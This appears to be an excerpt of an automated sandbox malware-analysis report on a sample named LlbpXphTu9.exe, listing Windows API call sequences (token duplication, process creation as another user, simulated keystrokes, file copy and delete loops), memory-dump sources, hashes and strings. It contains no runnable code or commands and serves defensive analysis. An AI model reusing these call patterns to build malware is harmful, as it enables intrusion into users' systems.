                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ProcWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 181713994-0
                                                                                                                                                                            • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                                                                                            • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                                                                                                                                            • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                                                                                            • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                                                                                                                                            APIs
                                                                                                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateHeap
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 10892065-0
                                                                                                                                                                            • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                                                                                                            • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                                                                                                                                                            • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                                                                                                            • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
                                                                                                                                                                            • WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$PointerWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 539440098-0
                                                                                                                                                                            • Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                                                                                                            • Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
                                                                                                                                                                            • Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                                                                                                            • Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
                                                                                                                                                                            APIs
                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ProcWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 181713994-0
                                                                                                                                                                            • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                                                                                            • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                                                                                                                                            • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                                                                                            • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __wfsopen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 197181222-0
                                                                                                                                                                            • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                                                                            • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                                                                                                                                                            • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                                                                            • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                                                                                                                                                            APIs
                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                            • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                                                                                            • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                                                                                                                                                                            • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                                                                                            • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
                                                                                                                                                                            APIs
                                                                                                                                                                            • Sleep.KERNELBASE(000001F4), ref: 040022F9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2055232953.0000000004000000.00000040.00000020.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4000000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                            • Instruction ID: 9b5325836e57e734d94816b2663384a191b07e35480c7ea52a0bb73f73d05432
                                                                                                                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                            • Instruction Fuzzy Hash: 8FE0E67494010DDFDB00DFB4D54D69D7BB4EF04301F1045A5FD01E2280D6309D608A72
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                                                                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                                                                                                                            • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                                                                                                                            • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                                                                                                                            • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                                                                                                                            • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                                                                                                                            • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                                                                                                                            • SendMessageW.USER32 ref: 0047C2FB
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$State$LongProcWindow
                                                                                                                                                                            • String ID: @GUI_DRAGID$F
                                                                                                                                                                            • API String ID: 1562745308-4164748364
                                                                                                                                                                            • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                                                                                                            • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                                                                                                                                                            • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                                                                                                            • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: PF$'|G$*"D$*vG$+%F$0wE$2G$5CG$7eF$<HF$<G$ApG$DvE$GSG$IqE$K@G$LbF$MdF$NgF$PIF$YtG$^[F$_?G$b"D$i}G$j)F$kQG$lE$rTG$vjE$}eE$*F$3G$_G$wG
                                                                                                                                                                            • API String ID: 0-3772701627
                                                                                                                                                                            • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                                                                                                            • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                                                                                                                                                                            • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                                                                                                            • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
                                                                                                                                                                            • IsIconic.USER32(?), ref: 004375E1
                                                                                                                                                                            • ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 004375FD
                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00437619
                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00437645
                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0043765D
                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00437674
                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0043768B
                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 004376A2
                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 004376AD
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                            • API String ID: 3778422247-2988720461
                                                                                                                                                                            • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                                                                                                            • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                                                                                                                                                                            • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                                                                                                            • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 0044621B
                                                                                                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
                                                                                                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                                                                                                                                                            • GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
                                                                                                                                                                            • SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
                                                                                                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
                                                                                                                                                                            • _wcslen.LIBCMT ref: 0044639E
                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 004463C7
                                                                                                                                                                            • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                                                                                                                                                            • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                                                                                                                                                                            • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
                                                                                                                                                                            • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                                                                                                                                                            • CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
                                                                                                                                                                            • CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
                                                                                                                                                                            • SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
                                                                                                                                                                            • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                                                                                                                                                            • String ID: $default$winsta0
                                                                                                                                                                            • API String ID: 2173856841-1027155976
                                                                                                                                                                            • Opcode ID: 8783c105518f9fa52f5c80a6299cf7ec7b6e28c011eada52347f54b488ad9e21
                                                                                                                                                                            • Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
                                                                                                                                                                            • Opcode Fuzzy Hash: 8783c105518f9fa52f5c80a6299cf7ec7b6e28c011eada52347f54b488ad9e21
                                                                                                                                                                            • Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
                                                                                                                                                                            APIs
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00409A61
                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                            • String ID: 0vH$4RH
                                                                                                                                                                            • API String ID: 1143807570-2085553193
                                                                                                                                                                            • Opcode ID: 448372cbc2a04de0c58b15acec820b8f3e335fdb8b2659cade4efb497aaa83ea
                                                                                                                                                                            • Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
                                                                                                                                                                            • Opcode Fuzzy Hash: 448372cbc2a04de0c58b15acec820b8f3e335fdb8b2659cade4efb497aaa83ea
                                                                                                                                                                            • Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\LlbpXphTu9.exe,?,C:\Users\user\Desktop\LlbpXphTu9.exe,004A8E80,C:\Users\user\Desktop\LlbpXphTu9.exe,0040F3D2), ref: 0040FFCA
                                                                                                                                                                              • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
                                                                                                                                                                              • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
                                                                                                                                                                              • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
                                                                                                                                                                              • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                                                                            • _wcscat.LIBCMT ref: 0044BD96
                                                                                                                                                                            • _wcscat.LIBCMT ref: 0044BDBF
                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 0044BDEC
                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
                                                                                                                                                                            • _wcscpy.LIBCMT ref: 0044BE73
                                                                                                                                                                            • _wcscat.LIBCMT ref: 0044BE85
                                                                                                                                                                            • _wcscat.LIBCMT ref: 0044BE97
                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 0044BED5
                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BEF5
                                                                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 0044BF17
                                                                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0044BF35
                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BF51
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0044BF7E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                            • API String ID: 2188072990-1173974218
                                                                                                                                                                            • Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                                                                                                                            • Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
                                                                                                                                                                            • Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
